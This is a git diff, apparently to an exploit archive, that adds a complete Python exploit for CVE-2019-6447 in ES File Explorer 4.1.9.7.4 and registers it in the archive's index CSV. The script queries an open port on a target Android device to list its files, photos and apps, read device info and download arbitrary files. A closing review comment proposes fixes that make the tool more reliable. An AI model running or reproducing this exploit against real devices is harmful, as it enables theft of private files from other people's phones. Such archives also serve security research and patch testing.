diff --git a/exploits/android/remote/50070.py b/exploits/android/remote/50070.py
new file mode 100755
index 000000000..3d22d4d56
--- /dev/null
+++ b/exploits/android/remote/50070.py
@@ -0,0 +1,86 @@
+# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
+# Date: 29/06/2021
+# Exploit Author: Nehal Zaman
+# Version: ES File Explorer v4.1.9.7.4
+# Tested on: Android
+# CVE : CVE-2019-6447
+
+import requests
+import json
+import ast
+import sys
+
+if len(sys.argv) < 3:
+ print(f"USAGE {sys.argv[0]} [file to download]")
+ sys.exit(1)
+
+url = 'http://' + sys.argv[2] + ':59777'
+cmd = sys.argv[1]
+cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
+listCmds = cmds[:9]
+if cmd not in cmds:
+ print("[-] WRONG COMMAND!")
+ print("Available commands : ")
+ print(" listFiles : List all Files.")
+ print(" listPics : List all Pictures.")
+ print(" listVideos : List all videos.")
+ print(" listAudios : List all audios.")
+ print(" listApps : List Applications installed.")
+ print(" listAppsSystem : List System apps.")
+ print(" listAppsPhone : List Communication related apps.")
+ print(" listAppsSdcard : List apps on the SDCard.")
+ print(" listAppsAll : List all Application.")
+ print(" getFile : Download a file.")
+ print(" getDeviceInfo : Get device info.")
+ sys.exit(1)
+
+print("\n==================================================================")
+print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
+print("| Coded By : Nehal a.k.a PwnerSec |")
+print("==================================================================\n")
+
+header = {"Content-Type" : "application/json"}
+proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
+
+def httpPost(cmd):
+ data = json.dumps({"command":cmd})
+ response = requests.post(url, headers=header, data=data)
+ return ast.literal_eval(response.text)
+
+def parse(text, keys):
+ for dic in text:
+ for key in keys:
+ print(f"{key} : {dic[key]}")
+ print('')
+
+def do_listing(cmd):
+ response = httpPost(cmd)
+ if len(response) == 0:
+ keys = []
+ else:
+ keys = list(response[0].keys())
+ parse(response, keys)
+
+if cmd in listCmds:
+ do_listing(cmd)
+
+elif cmd == cmds[9]:
+ if len(sys.argv) != 4:
+ print("[+] Include file name to download.")
+ sys.exit(1)
+ elif sys.argv[3][0] != '/':
+ print("[-] You need to provide full path of the file.")
+ sys.exit(1)
+ else:
+ path = sys.argv[3]
+ print("[+] Downloading file...")
+ response = requests.get(url + path)
+ with open('out.dat','wb') as wf:
+ wf.write(response.content)
+ print("[+] Done. Saved as `out.dat`.")
+
+elif cmd == cmds[10]:
+ response = httpPost(cmd)
+ keys = list(response.keys())
+ for key in keys:
+ print(f"{key} : {response[key]}")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5f08fe159..9f234fed9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18511,6 +18511,7 @@ id,file,description,date,author,type,platform,port
 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
 50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware,
 50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",2021-06-21,"Nathaniel Singer",remote,solaris,
+50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",2021-06-29,"Nehal Zaman",remote,android,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
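Review bot: In the `getFile` branch of 50070.py the body of `requests.get(url + path)` is written to `out.dat` and reported as done without the HTTP status ever being checked, so an error page or an empty reply is saved as if it were the requested file. Call `response.raise_for_status()` right after the request, and pass `timeout=10` to both this `requests.get` and the `requests.post` in `httpPost`, since neither sets a timeout and a stalled connection can hang the script. The `proxy` dict is defined but never passed to either call; remove it or wire it in with `proxies=proxy`. Everything `parse` prints and everything written to `out.dat` comes from the remote device, so a short comment marking both as untrusted would help whoever runs this in a lab.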